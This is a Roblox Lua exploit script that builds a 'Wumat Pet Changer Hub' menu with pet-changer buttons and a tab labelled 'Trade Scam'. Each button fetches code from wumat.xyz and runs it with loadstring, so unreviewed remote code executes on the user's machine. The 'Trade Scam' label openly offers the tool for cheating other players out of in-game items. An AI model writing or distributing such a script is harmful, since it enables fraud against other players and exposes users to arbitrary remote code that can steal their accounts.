local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source%27)))()

local Window = OrionLib:MakeWindow({Name = "Wumat Pet Changer Hub", HidePremium = false, SaveConfig = true, ConfigFolder = "SpartanPlutonFolder"})
OrionLib:MakeNotification({
    Name = "WumatHub",
    Content = "Launching Success!",
    Image = "rbxassetid://4483345998",
    Time = 10
})

-- -- MAIN -- -- 

local Tab = Window:MakeTab({
    Name = "Informations",
    Icon = "rbxassetid://4483345998",
    PremiumOnly = false
})

local Section = Tab:AddSection({
    Name = "[IF NOT WORKING V1 TRY THE V2]"
}) 

local Tab = Window:MakeTab({
    Name = "PetChanger",
    Icon = "rbxassetid://4483345998",
    PremiumOnly = false
})

local Section = Tab:AddSection({
    Name = "Pet Changer V1"
})

Tab:AddButton({
    Name = "ON",
    Callback = function()
              print("Click here!")
      getgenv().key = "3587113a60a2e4ef5fd91a8154976336"
loadstring(game:HttpGetAsync("https://wumat.xyz/scripts/wumats-visual-hub.lua", true))()
        end

})


local Section = Tab:AddSection({
    Name = "Pet Changer V2"
})

Tab:AddButton({
    Name = "ON",
    Callback = function()
              print("Click here!")
      getgenv().key = "3587113a60a2e4ef5fd91a8154976336"
loadstring(game:HttpGetAsync("https://wumat.xyz/scripts/wumats-visual-hub.lua", true))()
        end
})

local Tab = Window:MakeTab({
    Name = "Trade Scam",
    Icon = "rbxassetid://4483345998",
    PremiumOnly = false
})

local Section = Tab:AddSection({
    Name = "Trade Scam"
})

Tab:AddButton({
    Name = "ON",
    Callback = function()
              print("Click here!")
      getgenv().key = "3587113a60a2e4ef5fd91a8154976336"
loadstring(game:HttpGetAsync("https://wumat.xyz/scripts/wumats-visual-hub.lua", true))()
        end
})

local Tab = Window:MakeTab({
    Name = "Close",
    Icon = "rbxassetid://4483345998",
    PremiumOnly = false
})

Tab:AddBind({
    Name = "Keybind",
    Default = Enum.KeyCode.G,
    Hold = false,
    Callback = function()
        print("Press here!")
    OrionLib:Destroy()
    end
})
